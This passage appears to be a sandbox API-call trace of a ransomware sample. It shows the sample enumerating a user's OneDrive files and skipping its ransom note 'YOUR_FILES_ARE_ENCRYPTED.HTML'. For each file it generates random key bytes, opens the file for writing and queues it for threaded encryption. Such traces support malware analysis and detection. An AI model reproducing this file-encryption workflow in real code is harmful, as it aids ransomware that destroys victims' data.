| out: param_1="C8") returned 2 [0112.847] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="04") returned 2 [0112.847] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="DE") returned 2 [0112.847] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="89") returned 2 [0112.847] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="A1") returned 2 [0112.847] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="57") returned 2 [0112.847] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="10") returned 2 [0112.847] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="5A") returned 2 [0112.847] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="2B") returned 2 [0112.847] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="D3") returned 2 [0112.847] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="C2") returned 2 [0112.847] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="11") returned 2 [0112.847] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="AD") returned 2 [0112.847] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="CE") returned 2 [0112.847] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="1F") returned 2 [0112.847] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="82") returned 2 [0112.848] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="AA") returned 2 [0112.848] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="A4") returned 2 [0112.848] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="A2") returned 2 [0112.848] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="7F") returned 2 [0112.848] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="4C") returned 2 [0112.848] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="DA") returned 2 [0112.848] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="84") returned 2 [0112.848] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="63") returned 2 [0112.848] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="63") returned 2 [0112.848] lstrcpyW (in: lpString1=0x3103074, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\AutoPlayLogo.png" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\AutoPlayLogo.png") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\AutoPlayLogo.png" [0112.848] CreateIoCompletionPort (FileHandle=0x334, ExistingCompletionPort=0x274, CompletionKey=0x30f2fc0, NumberOfConcurrentThreads=0x0) returned 0x274 [0112.848] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30f2fc0, lpOverlapped=0x30f2fc0) returned 1 [0112.852] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c711399, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x4c711399, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x4efe5598, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x5d8f6, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="AutoPlayOptIn.gif", cAlternateFileName="AUTOPL~1.GIF")) returned 1 [0112.852] StrStrIW (lpFirst="AutoPlayOptIn.gif", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.852] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\AutoPlayOptIn.gif") returned 93 [0112.852] PathFindExtensionW (pszPath="AutoPlayOptIn.gif") returned=".gif" [0112.852] lstrlenW (lpString=".gif") returned 4 [0112.852] PathFindExtensionW (pszPath="AutoPlayOptIn.gif") returned=".gif" [0112.852] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0112.852] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\AutoPlayOptIn.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_3\\autoplayoptin.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x334 [0112.853] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=383222) returned 1 [0112.853] GetProcessHeap () returned 0x600000 [0112.853] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30f2fc0 [0112.855] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="0D") returned 2 [0112.855] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="A4") returned 2 [0112.855] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="0A") returned 2 [0112.855] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="25") returned 2 [0112.855] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="42") returned 2 [0112.855] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="D9") returned 2 [0112.855] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="A1") returned 2 [0112.855] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="3C") returned 2 [0112.855] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="E3") returned 2 [0112.855] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="FC") returned 2 [0112.855] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="1A") returned 2 [0112.855] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="54") returned 2 [0112.855] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="05") returned 2 [0112.855] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="3B") returned 2 [0112.855] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="3E") returned 2 [0112.855] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="C4") returned 2 [0112.855] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="08") returned 2 [0112.855] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="C8") returned 2 [0112.855] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="9E") returned 2 [0112.855] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="9F") returned 2 [0112.855] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="C1") returned 2 [0112.856] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="85") returned 2 [0112.856] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="DF") returned 2 [0112.856] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="A2") returned 2 [0112.856] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="03") returned 2 [0112.856] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="15") returned 2 [0112.856] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="EB") returned 2 [0112.856] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="4E") returned 2 [0112.856] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="8A") returned 2 [0112.856] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="08") returned 2 [0112.856] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="96") returned 2 [0112.856] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="22") returned 2 [0112.856] lstrcpyW (in: lpString1=0x3103074, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\AutoPlayOptIn.gif" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\AutoPlayOptIn.gif") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\AutoPlayOptIn.gif" [0112.856] CreateIoCompletionPort (FileHandle=0x334, ExistingCompletionPort=0x274, CompletionKey=0x30f2fc0, NumberOfConcurrentThreads=0x0) returned 0x274 [0112.856] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30f2fc0, lpOverlapped=0x30f2fc0) returned 1 [0112.856] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f7329ea, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x4f7329ea, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x4f7cb58f, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x27f2, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="AutoPlayOptIn.png", cAlternateFileName="AUTOPL~2.PNG")) returned 1 [0112.856] StrStrIW (lpFirst="AutoPlayOptIn.png", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.856] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\AutoPlayOptIn.png") returned 93 [0112.856] PathFindExtensionW (pszPath="AutoPlayOptIn.png") returned=".png" [0112.857] lstrlenW (lpString=".png") returned 4 [0112.857] PathFindExtensionW (pszPath="AutoPlayOptIn.png") returned=".png" [0112.857] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0112.857] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\AutoPlayOptIn.png" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_3\\autoplayoptin.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x318 [0112.857] GetFileSizeEx (in: hFile=0x318, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=10226) returned 1 [0112.858] GetProcessHeap () returned 0x600000 [0112.858] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30a0048 [0112.860] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="FE") returned 2 [0112.860] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="1A") returned 2 [0112.860] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="8D") returned 2 [0112.860] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="CD") returned 2 [0112.860] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="CE") returned 2 [0112.860] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="B5") returned 2 [0112.860] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="B4") returned 2 [0112.860] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="C1") returned 2 [0112.860] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="7D") returned 2 [0112.860] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="CC") returned 2 [0112.860] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="EF") returned 2 [0112.860] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="EE") returned 2 [0112.860] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="15") returned 2 [0112.860] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="13") returned 2 [0112.860] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="61") returned 2 [0112.860] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="7A") returned 2 [0112.861] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="8F") returned 2 [0112.861] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="45") returned 2 [0112.861] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="EB") returned 2 [0112.861] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="36") returned 2 [0112.861] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="5E") returned 2 [0112.861] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="4F") returned 2 [0112.861] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="9E") returned 2 [0112.861] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="30") returned 2 [0112.861] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="38") returned 2 [0112.861] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="0D") returned 2 [0112.861] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="1F") returned 2 [0112.861] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="3C") returned 2 [0112.861] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="E6") returned 2 [0112.861] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="01") returned 2 [0112.861] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="CD") returned 2 [0112.861] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="02") returned 2 [0112.861] lstrcpyW (in: lpString1=0x30b00fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\AutoPlayOptIn.png" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\AutoPlayOptIn.png") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\AutoPlayOptIn.png" [0112.862] CreateIoCompletionPort (FileHandle=0x318, ExistingCompletionPort=0x274, CompletionKey=0x30a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0112.862] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30a0048, lpOverlapped=0x30a0048) returned 1 [0112.862] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f863ecc, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x4f863ecc, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x4f8fc8ef, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x16da, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="CollectOneDriveLogs.bat", cAlternateFileName="COLLEC~1.BAT")) returned 1 [0112.862] StrStrIW (lpFirst="CollectOneDriveLogs.bat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.862] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\CollectOneDriveLogs.bat") returned 99 [0112.862] PathFindExtensionW (pszPath="CollectOneDriveLogs.bat") returned=".bat" [0112.862] lstrlenW (lpString=".bat") returned 4 [0112.862] PathFindExtensionW (pszPath="CollectOneDriveLogs.bat") returned=".bat" [0112.862] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0112.862] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\CollectOneDriveLogs.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_3\\collectonedrivelogs.bat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x310 [0112.863] GetFileSizeEx (in: hFile=0x310, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=5850) returned 1 [0112.863] GetProcessHeap () returned 0x600000 [0112.863] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30c81a0 [0112.865] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="9E") returned 2 [0112.865] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="FD") returned 2 [0112.865] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="DA") returned 2 [0112.865] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="3B") returned 2 [0112.865] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="79") returned 2 [0112.866] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="6D") returned 2 [0112.866] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="5B") returned 2 [0112.866] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="C2") returned 2 [0112.866] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="4F") returned 2 [0112.866] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="B1") returned 2 [0112.866] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="E2") returned 2 [0112.866] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="0D") returned 2 [0112.866] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="1B") returned 2 [0112.866] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="8A") returned 2 [0112.866] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="C0") returned 2 [0112.866] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="D5") returned 2 [0112.866] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="EB") returned 2 [0112.866] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="8E") returned 2 [0112.866] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="87") returned 2 [0112.866] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="B6") returned 2 [0112.866] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="52") returned 2 [0112.866] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="7F") returned 2 [0112.866] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="E1") returned 2 [0112.866] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="E7") returned 2 [0112.866] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="E2") returned 2 [0112.866] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="63") returned 2 [0112.866] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="11") returned 2 [0112.866] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="D8") returned 2 [0112.866] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="C9") returned 2 [0112.866] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="28") returned 2 [0112.866] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="2A") returned 2 [0112.866] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="4F") returned 2 [0112.867] lstrcpyW (in: lpString1=0x30d8254, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\CollectOneDriveLogs.bat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\CollectOneDriveLogs.bat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\CollectOneDriveLogs.bat" [0112.867] CreateIoCompletionPort (FileHandle=0x310, ExistingCompletionPort=0x274, CompletionKey=0x30c81a0, NumberOfConcurrentThreads=0x0) returned 0x274 [0112.867] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30c81a0, lpOverlapped=0x30c81a0) returned 1 [0112.867] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f96ed39, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x4f96ed39, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x4fa075cf, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x72c0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="ETWlog.dll", cAlternateFileName="")) returned 1 [0112.867] StrStrIW (lpFirst="ETWlog.dll", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.867] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ETWlog.dll") returned 86 [0112.867] PathFindExtensionW (pszPath="ETWlog.dll") returned=".dll" [0112.867] lstrlenW (lpString=".dll") returned 4 [0112.867] PathFindExtensionW (pszPath="ETWlog.dll") returned=".dll" [0112.867] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0112.867] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ETWlog.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_3\\etwlog.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x330 [0112.868] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=29376) returned 1 [0112.868] GetProcessHeap () returned 0x600000 [0112.868] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x660338 [0112.870] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="71") returned 2 [0112.870] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="1B") returned 2 [0112.870] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="3C") returned 2 [0112.870] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="1E") returned 2 [0112.870] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="FB") returned 2 [0112.870] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="F9") returned 2 [0112.870] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="6B") returned 2 [0112.871] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="A0") returned 2 [0112.871] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="C3") returned 2 [0112.871] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="D2") returned 2 [0112.871] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="C8") returned 2 [0112.871] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="AA") returned 2 [0112.871] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="10") returned 2 [0112.871] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="8D") returned 2 [0112.871] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="E4") returned 2 [0112.871] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="6F") returned 2 [0112.871] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="EB") returned 2 [0112.871] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="4E") returned 2 [0112.871] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="F8") returned 2 [0112.871] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="0D") returned 2 [0112.871] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="30") returned 2 [0112.871] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="51") returned 2 [0112.871] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="E1") returned 2 [0112.871] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="C0") returned 2 [0112.871] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="60") returned 2 [0112.871] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="F7") returned 2 [0112.871] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="B4") returned 2 [0112.871] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="00") returned 2 [0112.871] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="CD") returned 2 [0112.871] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="7F") returned 2 [0112.871] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="A5") returned 2 [0112.871] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="48") returned 2 [0112.872] lstrcpyW (in: lpString1=0x6703ec, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ETWlog.dll" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ETWlog.dll") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ETWlog.dll" [0112.872] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x274, CompletionKey=0x660338, NumberOfConcurrentThreads=0x0) returned 0x274 [0112.872] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x660338, lpOverlapped=0x660338) returned 1 [0112.872] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4fa075cf, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x4fa075cf, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x4fc43cb2, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x4e5f, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="ExclusionList.xml", cAlternateFileName="EXCLUS~1.XML")) returned 1 [0112.872] StrStrIW (lpFirst="ExclusionList.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.872] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ExclusionList.xml") returned 93 [0112.872] PathFindExtensionW (pszPath="ExclusionList.xml") returned=".xml" [0112.872] lstrlenW (lpString=".xml") returned 4 [0112.872] PathFindExtensionW (pszPath="ExclusionList.xml") returned=".xml" [0112.872] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0112.872] CreateFileW 